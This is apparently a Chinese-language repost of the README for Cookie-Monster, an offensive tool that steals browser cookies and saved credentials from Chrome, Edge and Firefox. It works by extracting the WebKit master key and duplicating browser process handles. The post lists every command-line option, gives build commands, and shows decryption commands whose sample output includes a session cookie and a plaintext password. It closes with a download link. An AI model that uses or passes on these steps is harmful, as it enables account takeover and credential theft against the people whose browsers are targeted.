Cookie-Monster - BOF 窃取浏览器 Cookie 和凭证

Cookie-Monster - BOF 窃取浏览器 Cookie 和凭证

CookieMonster  BOF 窃取浏览器 Cookie 和凭证-1.png

通过 BOF 或 exe窃取edge、chrome 和firefox的浏览器cookie !Cookie-Monster 将提取 WebKit 主密钥,找到具有 Cookies 和登录数据文件句柄的浏览器进程,复制句柄,然后无文件下载目标。下载 Cookies/登录数据文件后,python解密脚本可以帮助提取这些机密!Firefox 模块将解析profiles.ini 并找到 logins.json 和 key4.db 文件所在的位置并下载它们。引用单独的 github repo 进行离线解密


转炉使用情况​

Usage: cookie-monster [ --chrome || --edge || --firefox || --chromeCookiePID &lt;pid&gt; || --chromeLoginDataPID &lt;PID&gt; || --edgeCookiePID &lt;pid&gt; || --edgeLoginDataPID &lt;pid&gt;] <br>cookie-monster Example: <br> cookie-monster --chrome <br> cookie-monster --edge <br> cookie-moster --firefox <br> cookie-monster --chromeCookiePID 1337<br> cookie-monster --chromeLoginDataPID 1337<br> cookie-monster --edgeCookiePID 4444<br> cookie-monster --edgeLoginDataPID 4444<br>cookie-monster Options: <br> --chrome, looks at all running processes and handles, if one matches chrome.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD <br> --edge, looks at all running processes and handles, if one matches msedge.exe it copies the handle to Cookies/Login Data and then copies the file to the CWD <br> --firefox, looks for profiles.ini and locates the key4.db and logins.json file <br> --chromeCookiePID, if chrome PI D is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file<br> --chromeLoginDataPID, if chrome PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file <br> --edgeCookiePID, if edge PID is provided look for the specified process with a handle to cookies is known, specifiy the pid to duplicate its handle and file<br> --edgeLoginDataPID, if edge PID is provided look for the specified process with a handle to Login Data is known, specifiy the pid to duplicate its handle and file <br>

EXE 使用​

Cookie Monster Example:<br> cookie-monster.exe --all <br>Cookie Monster Options:<br> -h, --help Show this help message and exit<br> --all Run chrome, edge, and firefox methods<br> --edge Extract edge keys and download Cookies/Login Data file to PWD<br> --chrome Extract chrome keys and download Cookies/Login Data file to PWD<br> --firefox Locate firefox key and Cookies, does not make a copy of either file<br>

解密步骤​

安装要求

pip3 install -r requirements.txt<br>
对 webkit 主密钥进行 Base64 编码

python3 base64-encode.py "\xec\xfc...."<br>
解密 Chrome/Edge Cookies 文件

python .\decrypt.py "XHh..." --cookies ChromeCookie.db<br><br>Results Example:<br>-----------------------------------<br>Host: .<a href="http://github.com/" rel="nofollow">github.com</a><br>Path: /<br>Name: dotcom_user<br>Cookie: KingOfTheNOPs<br>Expires: Oct 28 2024 21:25:22<br><br>Host: <a href="http://github.com/" rel="nofollow">github.com</a><br>Path: /<br>Name: user_session<br>Cookie: x123.....<br>Expires: Nov 11 2023 21:25:22<br>
解密 Chome/Edge密码文件

python .\decrypt.py "XHh..." --passwords ChromePasswords.db<br><br>Results Example:<br>-----------------------------------<br>URL: <a href="https://test.com/" rel="nofollow">https://test.com/</a><br>Username: tester<br>Password: McTesty<br>
解密 Firefox Cookies 和存储的凭证:
https://github.com/lclevy/firepwd

安装​

编译之前确保 Mingw-w64 和 make 已安装在 Linux 上。

make<br>
在 windows 上编译 exe

gcc .\cookie-monster.c -o cookie-monster.exe -lshlwapi -lcrypt32<br>

待办事项​

参考​

如果没有 Mr-Un1k0d3r 和他精彩的季节性视频的帮助,这个项目不可能完成!强烈建议查看他的课程!!!
Cookie Webkit 主密钥提取器:https://github.com/Mr-Un1k0d3r/Cookie-Graber-BOF
无文件下载:https://github.com/fortra/nanodump
解密 Cookies 和登录数据:https://github.com/login-securite/DonPAPI




下载 Cookie-Monster
 
后退
顶部